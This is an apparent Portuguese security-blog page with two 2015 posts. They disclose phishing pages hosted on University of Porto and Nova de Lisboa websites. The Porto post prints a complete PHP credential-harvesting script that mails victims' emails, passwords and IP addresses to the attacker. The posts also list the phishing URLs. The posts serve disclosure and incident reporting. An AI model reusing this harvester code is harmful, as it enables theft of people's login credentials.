Todos os posts tagados universidade

Universidade Nova de Lisboa aloja página de Phishing

por David Sopas em 13 de Março de 2015 em Artigos com 2 Comentários Tweet
ataque_alerta

Recentemente publiquei que a Universidade do Porto estava alojar uma página de Phishing.
Hoje deparei-me com um alerta de uma nova universidade com uma página de Phishing ao Yahoo.

Desta vez trata-se da página do Estudo Interdisciplinar de Comunidades Alto Medievais - http://eicam-iem.fcsh.unl.pt/. Este site é um projecto centrado na região de Viseu, desenvolvido no âmbito do Instituto de Estudos Medievais da FCSH/UNL. É também financiado pela Fundação Calouste Gulbenkian.

eicam-iem.fcsh.unl.pt/wetindeyhappen/Indezx.html

A página de Phishing mostra uma cópia da página de autenticação do Yahoo! onde a vítima ao enviar o seus dados, está a enviar um pedido ao script PHP alojado no servidor loja - Loginc.php que envia um email com os dados para o utilizador malicioso.

yahoo_phishing

Um pouco estranho é que a página está alojada no wix.com.

Até à data deste artigo, a página de Phishing ainda está online.

Site da Universidade do Porto aloja página de Phishing

por David Sopas em 11 de Março de 2015 em Artigos com 4 Comentários Tweet
contas_google_phishing

O site do Centro de Educação Médica do Departamento da Faculdade de Medicina da Universidade do Porto - http://cem.med.up.pt está alojar uma página que está a ser utilizada para Phishing de contas do Google.

O endereço afetado continua ativo e foi divulgado na base de dados Clean-MX.

http://cem.med.up.pt/images/banners/Domain/

Dado à possibilidade de listagens de ficheiros do servidor web, é possível descarregar o ficheiro [inserido em 17 de Fevereiro de 2015] utilizado pelo utilizador malicioso, no qual divulgo:

<?php
$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Email ID: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['emailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Lord PoPpA-----------------------------\n";
$recipient = "juwonlo7@XXXXXXXXXXX";
$subject = "TRANSACTION LOGIN";
$headers = "From: DOMAIN";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.bluehost.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>

De referir que o site corre Joomla! e poderá ter sido essa a porta de entrada da intrusão.
Uma cópia desta informação foi enviada ao report @cert.pt para uma possível resolução.